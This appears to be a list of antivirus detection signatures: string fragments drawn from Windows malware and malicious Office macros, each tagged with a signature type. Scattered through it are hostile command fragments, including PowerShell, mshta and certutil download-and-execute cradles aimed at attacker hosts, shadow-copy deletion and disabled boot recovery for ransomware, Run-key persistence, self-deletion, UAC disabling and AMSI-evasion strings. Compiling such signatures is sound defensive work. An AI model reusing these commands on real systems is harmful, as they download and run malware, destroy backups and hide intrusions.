- javascript (PEHSTR_EXT)
- \Run\ (PEHSTR_EXT)
- window.showMod (PEHSTR_EXT)
- "window.open=null; (PEHSTR_EXT)
- clickstory.co.kr/? (PEHSTR_EXT)
- click.linkprice.com/click.php?m= (PEHSTR_EXT)
- javascript: (PEHSTR_EXT)
- %LOIOLA%set ix=user_pref("network.pr (PEHSTR_EXT)
- ping 127.0.0.1 -n 3&del "%s" (PEHSTR_EXT)
- wscript.exe (PEHSTR_EXT)
- %s\ms%d.dll (PEHSTR_EXT)
- .Sandbox (PEHSTR_EXT)
- .FBApi.1 (PEHSTR_EXT)
- .BHO = s 'CrossriderApp00004 (PEHSTR_EXT)
- } = s 'Aqori.com' (PEHSTR_EXT)
- .BHO = s 'CrossriderApp0004 (PEHSTR_EXT)
- txtpasswd.value=pwdekad (PEHSTR_EXT)
- parent.parent.Dummy.getpwd()d (PEHSTR_EXT)
- <script>window.location = "https://www.santandernet (PEHSTR_EXT)
- .document.frmEnviar.txtEka.value=Eka; (PEHSTR_EXT)
- Dllsaintangerc\Release (PEHSTR_EXT)
- 205.234.134.102 (PEHSTR_EXT)
- 1.0.0.0 (PEHSTR_EXT)
- fMenu.AbrePagina(2773);</script> (PEHSTR_EXT)
- checaAltura(){};</script (PEHSTR_EXT)
- echo createobject("wscript.shell").run " (PEHSTR_EXT)
- .bat",0,true >> (PEHSTR_EXT)
- z:\project2012\remotecontrol\winhttpnet\cqgaen\app\installscript\objfre_wxp_x86\i386\InstallScript.pdb (PEHSTR_EXT)
- z:\project2012\remotecontrol\winhttpnet\amcy\app\win7\serviceapp\objfre_wxp_x86\i386\ServiceApp.pdb (PEHSTR_EXT)
- ftptransfer. (PEHSTR_EXT)
- wscript.exe "%sbb.js" (PEHSTR_EXT)
- C:\intel (PEHSTR_EXT)
- clark.ini (PEHSTR_EXT)
- 550 clark.ini (PEHSTR_EXT)
- Global\ (PEHSTR_EXT)
- \Windows\CurrentVersion\Run (PEHSTR_EXT)
- phpMyAdmin/scripts/setup.php (PEHSTR_EXT)
- biz/s.ico (PEHSTR_EXT)
- >nul del %0 /s/q/a/f (PEHSTR_EXT)
- microsoft\windows nt\currentversion\winlogon (PEHSTR_EXT)
- http://%s:%d/%d%s (PEHSTR_EXT)
- http://egopay.ru/num/ (PEHSTR_EXT)
- http://counter.moneyextre.me/addsubscription.php?abon=7 (PEHSTR_EXT)
- \\.\yspy000 (PEHSTR)
- *SYSTEM\CurrentControlSet\Control\SafeBoot\d (PEHSTR)
- SetSecurityDescriptorDacld (PEHSTR)
- Comspec (PEHSTR)
- /c del " (PEHSTR)
- svchost.exe (PEHSTR)
- r_server.exe (PEHSTR)
- *SYSTEM\CurrentControlSet\Services\r_server (PEHSTR)
- /pass: (PEHSTR)
- /port: (PEHSTR)
- SOFTWARE\Borland\Delphi\RTLd (PEHSTR_EXT)
- \\.\mailslot\ (PEHSTR_EXT)
- loplop.ini (PEHSTR_EXT)
- lop_b.sys (PEHSTR_EXT)
- \\.\HxDefDriver (PEHSTR_EXT)
- \\.\mailslot\hxdef-rk100s (PEHSTR_EXT)
- \\.\mailslot\hxdef-rk100s0ACEE761 (PEHSTR_EXT)
- Prefetch\*.pf (PEHSTR_EXT)
- \\.\mailslot\hxdef-rkc (PEHSTR_EXT)
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\ (PEHSTR_EXT)
- \Battle.net\Identity (PEHSTR_EXT)
- \V3Medic.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Ole (PEHSTR_EXT)
- V3Medic.exe (PEHSTR_EXT)
- %s\AYLaunch.exe (PEHSTR_EXT)
- %s\usp10.dll.bak (PEHSTR_EXT)
- <description><![CDATA[ (PEHSTR_EXT)
- btnSubscriptionsClick (PEHSTR_EXT)
- onSubscriptionNumberChange (PEHSTR)
- stariffs.rud (PEHSTR_EXT)
- rufile.ind (PEHSTR_EXT)
- realfine.ind (PEHSTR_EXT)
- fastru.ind (PEHSTR_EXT)
- ri ffs .rud (PEHSTR_EXT)
- lapoxol.in (PEHSTR_EXT)
- btnSubscriptionCheckCode (PEHSTR_EXT)
- G-dx70k^,.jb1. (PEHSTR_EXT)
- lSubscriptionStep3 (PEHSTR_EXT)
- btnsubscriptioncheckcode (PEHSTR_EXT)
- lChooseDifferentSubscriptionNumberClick (PEHSTR_EXT)
- btnSubscriptionCheckCodeImgLabel (PEHSTR_EXT)
- %CDATA[flashsetup]]></description><id> (PEHSTR)
- ZipFlash.exe (PEHSTR)
- ff2.vbs (PEHSTR_EXT)
- %%\wscript.exe (PEHSTR_EXT)
- \ff2.vbs (PEHSTR_EXT)
- firefox2.vbs (PEHSTR_EXT)
- \firefox2.vbs (PEHSTR_EXT)
- CHARGEMENT. (PEHSTR_EXT)
- (BE|KB)\.tmp\.(exe|[0-9]{1,2}\.exe)d (PEHSTR_EXT)
- |temp~manager\.exe|ServicesStarter\.exe$2 (PEHSTR_EXT)
- A_UserName,"drwebstatic.hopto.org2 (PEHSTR_EXT)
- delete, %startup%\Secure Web.lnk2 (PEHSTR_EXT)
- a_scriptname != "temp~manager.exe" (PEHSTR_EXT)
- %file_mov_dir%\~DF%nnn%KB.tmp.exe (PEHSTR_EXT)
- %atemp%\~temp~%ayday%~.tmp (PEHSTR_EXT)
- SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, 1, (PEHSTR_EXT)
- -.xml (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, EnableLUA, 0 (PEHSTR_EXT)
- CurrentVersion\Run, (PEHSTR_EXT)
- CurrentVersion\RunOnce, (PEHSTR_EXT)
- b\N+?N (SNID)
- 4\SDe (SNID)
- ?/h~~vx (SNID)
- JsX (SNID)
- ntdll (PEHSTR_EXT)
- avicap32.dll (PEHSTR_EXT)
- cmd.exe / (PEHSTR_EXT)
- ping 127.0.0.1 & del " (PEHSTR_EXT)
- %s\WService.dll (PEHSTR_EXT)
- %s\regsvr32.exe (PEHSTR_EXT)
- @facebook.com.xpi (PEHSTR_EXT)
- ://pubupl.com/updates/ (PEHSTR_EXT)
- sm5r/t0oa/g8llkaie.xml (PEHSTR_EXT)
- "scripts": [ "ante.js", (PEHSTR_EXT)
- "scripts": [ "supprimer.js", (PEHSTR_EXT)
- capGetDriverDescriptionA (PEHSTR_EXT)
- mode=2&done=1&cmdid= (PEHSTR_EXT)
- try {jwplayer().play()} (PEHSTR_EXT)
- '>click</a> (PEHSTR_EXT)
- .Run(" (PEHSTR_EXT)
- mshta "javascript: (PEHSTR_EXT)
- =new ActiveXObject("WScript.Shell"); (PEHSTR_EXT)
- scriptable_host": [ "http://*/*" ] (PEHSTR_EXT)
- //Google//Chrome//User Data//Default//Preferences (PEHSTR_EXT)
- chrome.exe (PEHSTR_EXT)
- opera.exe (PEHSTR_EXT)
- \winregist.er (PEHSTR_EXT)
- ServiceDll (PEHSTR)
- %s\%sex.dll (PEHSTR)
- ,%SystemRoot%\System32\svchost.exe -k netsvcs (PEHSTR)
- SetSecurityDescriptorControl (PEHSTR)
- 4SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost (PEHSTR)
- ^S\P^Z (MACRO_SOURCE)
- Z'Y`/ (MACRO_SOURCE)
- 80.242.123.155/" (MACROHSTR_EXT)
- exe/ (MACROHSTR_EXT)
- http://46.30.43.146/909.jpg (MACROHSTR_EXT)
- 034f43+buhu5.ru/ (MACROHSTR_EXT)
- http://thewelltakeberlin.com/92.exe (MACROHSTR_EXT)
- nzzv://suxkroqkyzujge.ius/ulloik.kdk (MACROHSTR_EXT)
- + "46.30.41" + ".150/" + "bb.ty" + "p" (MACROHSTR_EXT)
- Shell (qau.aoi.Text & wpvmbiudhmceufab) (MACROHSTR_EXT)
- https://ads-letter.info/client_script.js (MACROHSTR_EXT)
- twm1qP5X34eq.Open "poST", bt9tzD.J3jEet1U5 (MACROHSTR_EXT)
- yos/mtcpp.i.tiwcdtow/nhew1ieg/.mm//2x/m:va (MACROHSTR_EXT)
- beesteriphudilulunpecharakkees\pm.j\\:sptth (MACROHSTR_EXT)
- Call VBA.Shell( (MACROHSTR_EXT)
- "dolphin2000.ir/tmp/" (MACROHSTR_EXT)
- "gnf.jotpee.de/tmp/" (MACROHSTR_EXT)
- .Open "GET", (MACROHSTR_EXT)
- http://darkbreak.webcindario.com/update/myapp.zip (MACROHSTR_EXT)
- StrReverse("e.tsohnvs\pmeT\lacoL\%ATADPPA%") & "xe (MACROHSTR_EXT)
- cleen.bat (PEHSTR_EXT)
- .two@AUSI.COM (PEHSTR_EXT)
- .docx (PEHSTR_EXT)
- africa.bmp (PEHSTR_EXT)
- .jpeg (PEHSTR_EXT)
- /close/script.php (PEHSTR_EXT)
- .com/open/script.php (PEHSTR_EXT)
- \Microsoft\PlayReady\Fidmdtpy\Jdoauytbiw (FOLDERNAME)
- \Microsoft\PlayReadySilverlight\Myfmidc\Fgydngcbxcs (FOLDERNAME)
- 7Js (SNID)
- 7(\#h+ (SNID)
- ~9?,\y/` (SNID)
- mS .j (SNID)
- Vt/vo (SNID)
- ~z.#Q (SNID)
- {sE.m} (SNID)
- =httpu (PEHSTR_EXT)
- JavaScript (PEHSTR_EXT)
- Communicate (PEHSTR_EXT)
- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication (PEHSTR_EXT)
- rundll32.exe vbscript:"\..\mshtml,RunHTMLApplication (PEHSTR_EXT)
- 8)Cs\ (MACRO_SOURCE)
- /7rvmnb (MACROHSTR_EXT)
- (/af/7rvmnb (MACROHSTR_EXT)
- (/7rvmnb (MACROHSTR_EXT)
- uggc://nyhpneqban.pbz/wf/ova.rkr (MACROHSTR_EXT)
- \qfUUU.rkr (MACROHSTR_EXT)
- oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa (MACROHSTR_EXT)
- WScript.Shell (MACROHSTR_EXT)
- PHT = "" & "ht" & "t" & "p://" & "" (MACROHSTR_EXT)
- SPIC = "" & "s" & "av" & "epi" + "c.su" + "/" (MACROHSTR_EXT)
- LNSS = "lns.txt" (MACROHSTR_EXT)
- objProcess.Create "power" & "shell" & ".exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit (MACROHSTR_EXT)
- fspresentationproducts.com/ (MACROHSTR_EXT)
- "chameleonpaintworks.com/w" + "p-con" + "tent/pl" + "ugins/w" + "p-jqu" + "ery-lig" + "htbox/sty" + "les/imag" + "es/he_IL/" (MACROHSTR_EXT)
- "www.in" + "caltaminte.in" + "fo/w" + "p-content/upl" + "oads/201" + "5/0" + "6/" (MACROHSTR_EXT)
- "www.iscmo" + "ntegranaro.it/w" + "p-content/upl" + "oads/201" + "5/0" + "6/" (MACROHSTR_EXT)
- _1.Open (MACROHSTR_EXT)
- "mistatuajes.com.es/w" + "p-co" + "ntent/plu" + "gins/wor" + "dp" + "ress-seo/v" + "endor/yo" + "ast/lic" + "ense-man" + "ager/sa" + "mples/" (MACROHSTR_EXT)
- "misfrutales.com.es/w" + "p-co" + "nten" + "t/p" + "lugin" + "s/nin" + "ja-pop" + "ups/adm" + "in/cs" + "s/jqu" + "ery-ui-ari" + "sto/ima" + "ges/" (MACROHSTR_EXT)
- gitos." (PEHSTR_EXT)
- =type="password" class="campo" size="6" maxlength="6" /> (PEHSTR_EXT)
- javascript:acessaPagina("seleciona_investimento.processa") (PEHSTR_EXT)
- SCREENSHOT (PEHSTR_EXT)
- /pki/mscorp/crl/MSIT (PEHSTR_EXT)
- /script?u= (PEHSTR_EXT)
- .zapto.org: (MACROHSTR_EXT)
- .ResponseBody (MACROHSTR_EXT)
- .SaveToFile ("C:\Windows\Temp\ (MACROHSTR_EXT)
- "\warant.exe" (MACROHSTR_EXT)
- = VBA.CreateObject("WScript.Shell") (MACROHSTR_EXT)
- .Language = "jscript" (MACROHSTR_EXT)
- </name> (PEHSTR_EXT)
- <em:description>Quick Searcher (PEHSTR_EXT)
- </em:description> (PEHSTR_EXT)
- 127.0.0.1 clients2.google.com (PEHSTR_EXT)
- \signal.dat (PEHSTR_EXT)
- \Yandex\YandexBrowser\User Data\Default\ (PEHSTR_EXT)
- \Amigo\User Data\Default\Extension Data (PEHSTR_EXT)
- \Opera Software\Opera Stable\Preferences (PEHSTR_EXT)
- AvastSvc.exe (PEHSTR_EXT)
- avgrsx.exe (PEHSTR_EXT)
- \x37","\x38","\x39","\x30","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6C\x6F\x73\x61\x6E\x67\x6F\x6E\x65\x74\x2E\x63\x6F\x6D\x2E\x62\x72\x2F\x43\x6F\x6D\x6D\x6F\x6E\x73\x2F\x61\x73\x70\x2F\x42\x61\x72\x63\x6F\x64\x65 (PEHSTR_EXT)
- =["\x (PEHSTR_EXT)
- createobject("wscript.shell")>>"%userprofile%\run.vbs" (PEHSTR_EXT)
- echo objshell.run "%temp%\run.bat",vbhide>> (PEHSTR_EXT)
- Lib "shell32.dll" Alias (MACROHSTR_EXT)
- "ShellExecuteA" (ByVal (MACROHSTR_EXT)
- ("fyf/ (MACROHSTR_EXT)
- Shell "mshta javascript:""\..\mshtml,RunHTMLApplication "";GetObject(""script:http:/" + Replace(abadondend, (MACROHSTR_EXT)
- Shell "mshta javascript:""\..\mshtml,RunHTMLApplication "";GetObject(""script:http: (MACROHSTR_EXT)
- host_scripts (PEHSTR_EXT)
- href\s*=\s*(?:["'](?<1>[^"']*)["']|(?<1>\S+)) (PEHSTR_EXT)
- ^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$ (PEHSTR_EXT)
- javascript:for(var C=0;C<q_aUinList.length;C++){var D=q_aUinList[C];document.write(D.uin+","+D.key+"[ (PEHSTR_EXT)
- xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1 (PEHSTR_EXT)
- xnote.cn/api/note/save/ (PEHSTR_EXT)
- blog.gentilkiwi.com/mimikatz (PEHSTR)
- kelloworld.dll (PEHSTR)
- powerkatz.dll (PEHSTR_EXT)
- getDescription (PEHSTR_EXT)
- \Projets\vbsedit_source\script2exe\Release\mywscript.pdb (PEHSTR_EXT)
- g.disgogoweb.com/ (PEHSTR_EXT)
- taskkill /f /im msiexev.exe (PEHSTR_EXT)
- scripts\miner.lua (PEHSTR_EXT)
- \svchost\obj\Debug\svchost.pdb (PEHSTR_EXT)
- System.dll (PEHSTR_EXT)
- \System.dll (PEHSTR_EXT)
- sportswoman.dll (PEHSTR_EXT)
- ConscriptProtozoanBedfellow (PEHSTR_EXT)
- ThisDocument. (MACROHSTR_EXT)
- Err.Description (MACROHSTR_EXT)
- Err.Raise Number:=1 (MACROHSTR_EXT)
- .cscript //nologo c:\windows\system32\slmgr.vbs (PEHSTR)
- If Application.RecentFiles.Count < 3 Then Module1. (MACROHSTR_EXT)
- Err.Raise Number:=4, Description:=s( (MACROHSTR_EXT)
- ZMwb.Open(s("TEG", 17, 23), (MACROHSTR_EXT)
- cOuh = ZMwb.ResponseText (MACROHSTR_EXT)
- Esfile = Environ("TEMP") & "\ (MACROHSTR_EXT)
- htajs" (MACROHSTR_EXT)
- Dfile = ThisWorkbook.Path & "\ (MACROHSTR_EXT)
- p.xls" (MACROHSTR_EXT)
- Dfile = Environ("TEMP") & "\ (MACROHSTR_EXT)
- Shell "cscript /E:vbscript """ & Jsfile & """", vbHide (MACROHSTR_EXT)
- File description (PEHSTR_EXT)
- gateway.php (PEHSTR_EXT)
- CreateObject("Scripting.FileSystemObject (MACROHSTR_EXT)
- .CreateTextFile(js, True) (MACROHSTR_EXT)
- Shell "wscript (MACROHSTR_EXT)
- ikabaddi.in (MACROHSTR_EXT)
- lybybirdie. (MACROHSTR_EXT)
- ch.navit (MACROHSTR_EXT)
- elia.com carsg (MACROHSTR_EXT)
- ames.org (MACROHSTR_EXT)
- && start wscript //B //E:JScript (PEHSTR_EXT)
- %c%c%c%c%c%c.exe (PEHSTR_EXT)
- /c @ping -n 5 127.0.0.1&del (PEHSTR_EXT)
- Yow! Bad host lookup. (PEHSTR_EXT)
- SYSTEM\CurrentCont (PEHSTR_EXT)
- rolSet\Services\ (PEHSTR_EXT)
- /test_site_scripts/moduls/traffic/get_info.php (PEHSTR_EXT)
- 45.76.81.110 (PEHSTR_EXT)
- mailsupload.php (PEHSTR_EXT)
- /test_site_scripts/moduls/connects/ (PEHSTR_EXT)
- %s\OfficeTab\Favorites (PEHSTR_EXT)
- \ExcelFavorite.acl (PEHSTR_EXT)
- %s\MicroSoftWare (PEHSTR_EXT)
- %s\1FAAXB2.tmp (PEHSTR_EXT)
- %s\%s.HTML (PEHSTR_EXT)
- %s\%s.TXT (PEHSTR_EXT)
- %s\Stop Ransomware Decrypts Tools.exe (PEHSTR_EXT)
- %s\MicroSoftWare\SmartScreen\%s.exe (PEHSTR_EXT)
- momory could not be read. (PEHSTR_EXT)
- Windows SmartScreen Updater (PEHSTR_EXT)
- /To buy the decryptor, you must pay the cost of: (PEHSTR)
- hmshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\ (PEHSTR)
- http://adobe.update-service.net/index.php?comp= (PEHSTR_EXT)
- %s%08X%08X%08X%08X.%s (PEHSTR_EXT)
- :\USERDATA\*.* (PEHSTR_EXT)
- ACH.ADB.ADS.AIT.AL.APJ. (PEHSTR_EXT)
- /js/other_scripts/get.php (PEHSTR_EXT)
- %s\Microsofts\Windows NT\%s.exe (PEHSTR_EXT)
- MS Common User Interface (PEHSTR_EXT)
- Virus and spyware definitions couldn't be updated. (PEHSTR_EXT)
- agntsvc.exeisqlplussvc.exe (PEHSTR_EXT)
- p:" + "//" + hammer + "/ (MACROHSTR_EXT)
- .ex" + "e})) (MACROHSTR_EXT)
- = CreateObject("vbscript.regexp") (MACROHSTR_EXT)
- .Global = (MACROHSTR_EXT)
- .Pattern = (MACROHSTR_EXT)
- .Replace( (MACROHSTR_EXT)
- = CreateObject("WScript.Shell") (MACROHSTR_EXT)
- http://bkainline2/fileadmin (MACROHSTR_EXT)
- /scripts/superfish/js/supersubs.php (PEHSTR_EXT)
- 212.47.254.187 (PEHSTR_EXT)
- %s\INSTRUCTION_FOR_HELPING_FILE_RECOVERY.TXT (PEHSTR_EXT)
- bcdedit /set {default} recoveryenabled No (PEHSTR_EXT)
- n<hta:application windowstate="minimize"/><script>new ActiveXObject("WScript.Shell").Run("cmd /c \"\""+window.l (PEHSTR)
- \HELP_%s.html (PEHSTR_EXT)
- process call create "cmd.exe /c vssadmin.exe delete shadows (PEHSTR_EXT)
- PG1ldGEgaHR0cC1lcXVpdj0ncmVmcmVzaCcgY29udGVudD0nMDsgdXJsPWh0dHA6Ly8 (PEHSTR_EXT)
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDYEYkIZivftqlhZCLdPcGwu4/MAHwbsB965BHJ120L9G1tmynAPpZc (PEHSTR_EXT)
- %02hu.%02hu.%04hu; (PEHSTR_EXT)
- SFX script commands (PEHSTR_EXT)
- miner\ (PEHSTR_EXT)
- .vbs" (PEHSTR_EXT)
- reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- MacScript "do shell script ""(curl -s (MACROHSTR_EXT)
- Read("OF") & ".pkg (MACROHSTR_EXT)
- ComputerName") & vbNewLine & Environ("UserDomain (MACROHSTR_EXT)
- schtasks /create /sc MINUTE /tn ""GoogleUpdateTasksMachineCore"" (MACROHSTR_EXT)
- \""sc\""r\""i\""p\""t:http://80.255.3.109/microsoft.js (MACROHSTR_EXT)
- ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion") (MACROHSTR_EXT)
- & "\Windows\System32\wscript.exe", (MACROHSTR_EXT)
- norwaynews.mooo.com (PEHSTR_EXT)
- ebay-global.publicvm.com (PEHSTR_EXT)
- psychology-blog.ezua.com (PEHSTR_EXT)
- /scripts/m/query.php?id= (PEHSTR_EXT)
- cmd.exe /c (PEHSTR_EXT)
- Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 (PEHSTR_EXT)
- script_code (PEHSTR_EXT)
- script_test.pyt (PEHSTR_EXT)
- inject.bin (PEHSTR_EXT)
- imain.bin (PEHSTR_EXT)
- setting arguments... (PEHSTR_EXT)
- Script has stopped (PEHSTR_EXT)
- Script SUCCESS (PEHSTR_EXT)
- Script FAILED (PEHSTR_EXT)
- script_codet (PEHSTR_EXT)
- console_exe (PEHSTR_EXT)
- CreateObject("Wscript.Shell") (PEHSTR_EXT)
- WScript.sleep (PEHSTR_EXT)
- .sendkeys"{numlock}" (PEHSTR_EXT)
- .sendkeys"{capslock}" (PEHSTR_EXT)
- .sendkeys"{scrolllock}" (PEHSTR_EXT)
- WScript.sleep (PEHSTR_EXT)
- Server.sfx.exe (PEHSTR_EXT)
- .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run (MACROHSTR_EXT)
- CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 (PEHSTR_EXT)
- http://212.109.196.67/gateway.php (PEHSTR_EXT)
- "inject": "<script>var home_link = \"https (PEHSTR_EXT)
- \usbddghci (PEHSTR_EXT)
- \UsbgKrnl (PEHSTR_EXT)
- /etc/atmfont.bin (PEHSTR_EXT)
- ktrap.dll (PEHSTR_EXT)
- atmfd.dll (PEHSTR_EXT)
- \LiptonMilkTea (PEHSTR_EXT)
- \Systemroot\system32\drivers\%wZ (PEHSTR_EXT)
- dump_dumpfve.sys (PEHSTR_EXT)
- \NPF-{0179AC45-C226-48e3-A205-DCA79C824051} (PEHSTR_EXT)
- PSSh\@ (PEHSTR_EXT)
- /arksig.js (PEHSTR_EXT)
- /bin/i386/dump.bin (PEHSTR_EXT)
- /bin/i386/kernel.bin (PEHSTR_EXT)
- /bin/i386/kernel.sig (PEHSTR_EXT)
- /boot/boot.cfg (PEHSTR_EXT)
- /boot/kernel (PEHSTR_EXT)
- /etc/crypto.key (PEHSTR_EXT)
- /etc/original.dat (PEHSTR_EXT)
- /setup.img (PEHSTR_EXT)
- = "d /V^:^O (MACROHSTR_EXT)
- /C" + """" + "^s^e^t (MACROHSTR_EXT)
- = "d.exe /c p^O^w^e^R^s^H^e^" + Format(Chr((( (MACROHSTR_EXT)
- //^:" + "^" + "p" + "^t^t" + "h@^" + (MACROHSTR_EXT)
- //^" + ":^p^" + "t^th" (MACROHSTR_EXT)
- = "d /V/C" + """" + "^s^ (MACROHSTR_EXT)
- /" + "/:" + "pt^t" + "^h^ (MACROHSTR_EXT)
- )) + "md /V (MACROHSTR_EXT)
- = "D /c " + """^cm^D; ; ; ^/v:^ON^ ;/^c ""; ; (MACROHSTR_EXT)
- .DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell (MACROHSTR_EXT)
- \..\." + ".\..\win" + "dows\system" + "32\cmd.exe" + " /c %Program" + "Data: (MACROHSTR_EXT)
- + "md /V" + "^:/" + Chr( (MACROHSTR_EXT)
- + CreateObject("Wscript.shell").Run( (MACROHSTR_EXT)
- VBA.Shell "" + (MACROHSTR_EXT)
- system.management.automation.scriptblock (PEHSTR_EXT)
- writescriptblocktolog (PEHSTR_EXT)
- logscriptblockstart (PEHSTR_EXT)
- logscriptblockend (PEHSTR_EXT)
- System.Management.Automation.AmsiUtils (PEHSTR_EXT)
- invisishellprofiler.dll (PEHSTR_EXT)
- InvisiShellProfiler.Dll (PEHSTR_EXT)
- DllGetCl (PEHSTR_EXT)
- & "scripting" & ".filesyst" & "emobject") (MACROHSTR_EXT)
- = CreateObject("scripting.filesystemobject") (MACROHSTR_EXT)
- = CreateObject("scripting.filesystemobject") (MACROHSTR_EXT)
- (Application.MailSystem) Like (MACROHSTR_EXT)
- .fuck.exe (PEHSTR)
- = jtykpype.GetFolder(agulu.expandEnvironmentStrings("%PROGRAMFILES%")) (MACROHSTR_EXT)
- ssugym = "wscri" & bxeko & "xe " & otkybw & "script " & wolyx (MACROHSTR_EXT)
- = CreateObject("microsoft.xmlhttp") (MACROHSTR_EXT)
- = CreateObject("Shell.Application") (MACROHSTR_EXT)
- .Status = 200 Then (MACROHSTR_EXT)
- = CreateObject("adodb.stream") (MACROHSTR_EXT)
- ~9,2% /V (MACROHSTR_EXT)
- ~9,2% " + "/V: (MACROHSTR_EXT)
- ",2% /V:O" + (MACROHSTR_EXT)
- + "9,2% /V:O" (MACROHSTR_EXT)
- ~9,2% /" + "V (MACROHSTR_EXT)
- "9,2% /V (MACROHSTR_EXT)
- ",2%" + " /V (MACROHSTR_EXT)
- a-zA-Z0-9 +).Run (MACROHSTR_EXT)
- .TextBox1) (MACROHSTR_EXT)
- wscript.shell (MACROHSTR_EXT)
- [runtime.interopservices.marshal].getmembers()[4].name).invoke( [runtime.interopservices.marshal]::securestringtoglqj (MACROHSTR_EXT)
- CreateObject("shell.application") (MACROHSTR_EXT)
- Selection.TypeText ( (MACROHSTR_EXT)
- ActiveDocument.Password = (MACROHSTR_EXT)
- .ShellExecute "cmd.exe", (MACROHSTR_EXT)
- ("ping 127.0.0.1 -n 2",false);}}} (PEHSTR_EXT)
- ()+".txt"; (PEHSTR_EXT)
- .run("certutil -encodehex " (PEHSTR_EXT)
- .Get("Win32_Process") (PEHSTR_EXT)
- 201,stream.Size); (PEHSTR_EXT)
- .open('','_self','') (PEHSTR_EXT)
- +net.ComputerName; (PEHSTR_EXT)
- .Run(cmd,0,!fork);} (PEHSTR_EXT)
- ()+".txt") (PEHSTR_EXT)
- \\..\\..\\..\\mshtml,RunHTMLApplication" (PEHSTR_EXT)
- scrobj.dll";if(fork32Bit) (PEHSTR_EXT)
- rundll32.exe javascript:\"\\..\\mshtml, (PEHSTR_EXT)
- "wmic os get /FORMAT:\ (PEHSTR_EXT)
- =new ActiveXObject("WScrip (PEHSTR_EXT)
- .Run(cmd, (PEHSTR_EXT)
- .UserDomain.length!=0 (PEHSTR_EXT)
- ()+".txt" (PEHSTR_EXT)
- jobkey,work.status== (PEHSTR_EXT)
- ActiveXObject("WScript.Shell"),STAGER:"http (PEHSTR_EXT)
- nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
- C:\Windows\System32\wscript.exe (PEHSTR_EXT)
- script-src 'self' https://www.gstatic.com/ https://accounts.google.com https://*.firebaseio.com https://www.googleapis.com; object-src 'self' (PEHSTR_EXT)
- \firebase-messaging.js (PEHSTR_EXT)
- \firebase-messaging-sw.js (PEHSTR_EXT)
- \Mozilla\Firefox\Profiles\ (PEHSTR_EXT)
- cscript //b //nologo %tmp%/ (PEHSTR_EXT)
- .vbs (PEHSTR_EXT)
- Wscript.Sleep 1000* (PEHSTR_EXT)
- data.dat (PEHSTR_EXT)
- CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) (PEHSTR_EXT)
- .RegWrite (MACROHSTR_EXT)
- ActiveWindow.View.ShowHiddenText = True (MACROHSTR_EXT)
- = Application.StartupPath + (MACROHSTR_EXT)
- = Shell("wscript.exe """ + (MACROHSTR_EXT)
- 2x%.2x%.2x%.2x%.2x% (PEHSTR_EXT)
- cmd /c %s (PEHSTR_EXT)
- Action.Path = "wmic" (MACROHSTR_EXT)
- Action.Arguments = "PROCESS call create ""wscript.exe /b /e:jscript " & rparam & "\" & lparam & """" (MACROHSTR_EXT)
- bee_je "auto.chk", lPath, "Sysupdate_805" (MACROHSTR_EXT)
- If (shd.Name = "Sh000001") Then (MACROHSTR_EXT)
- & "\msohtml.exe" (MACROHSTR_EXT)
- & " //E:vbscript /b " & (MACROHSTR_EXT)
- & "\msohtml.log" (MACROHSTR_EXT)
- = "HKCU\Software\Classes\CLSID\{" (MACROHSTR_EXT)
- & "}\Shell\Manage\Command\" (MACROHSTR_EXT)
- {0afaced1-e828-11d1-9187-b532f1e9575d}\ (PEHSTR_EXT)
- \target.lnk (PEHSTR_EXT)
- <html><body><script> (PEHSTR_EXT)
- </script></body></html> (PEHSTR_EXT)
- taskkill /im wscript.exe /f (PEHSTR)
- \tao.vbs (PEHSTR)
- \ls.vbs (PEHSTR)
- %Wscript.CreateObject("Wscript.Shell") (PEHSTR)
- WshShell.Run (PEHSTR)
- chromea.exe (PEHSTR)
- chromes.exe (PEHSTR)
- /\CurrentVersion\Policies\Explorer\Run\ADSL Dial (PEHSTR)
- C:\start.cmd (PEHSTR)
- @taskmgr.exe (PEHSTR)
- .RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updat", "wscript (MACROHSTR_EXT)
- \Silent.vbs", "REG_SZ" (MACROHSTR_EXT)
- costura.commandline.dll.compressed (PEHSTR_EXT)
- costura.heijden.dns.dll.compressed (PEHSTR_EXT)
- get_ComputerSamAccountName (PEHSTR_EXT)
- SetSecurityDescriptorBinaryForm (PEHSTR_EXT)
- mshta.exe javascript:getobject (MACROHSTR_EXT)
- Register-Cimprovider.exe -path c: (MACROHSTR_EXT)
- forfiles /p (MACROHSTR_EXT)
- C:\Windows /m notepad.exe /c (MACROHSTR_EXT)
- C:\Windows\System32\cmd.exe /c replace.exe (MACROHSTR_EXT)
- System32\replace.exe (MACROHSTR_EXT)
- cmd.exe /c certutil.exe -urlcache -split -f (MACROHSTR_EXT)
- msiexec.exe /q /i (MACROHSTR_EXT)
- C:\Windows\System32\Register-CimProvider.exe -path (MACROHSTR_EXT)
- Shell """" + "" + "ms" + "hta""""" + "https" + ":\\ (MACROHSTR_EXT)
- @j.mp\ (MACROHSTR_EXT)
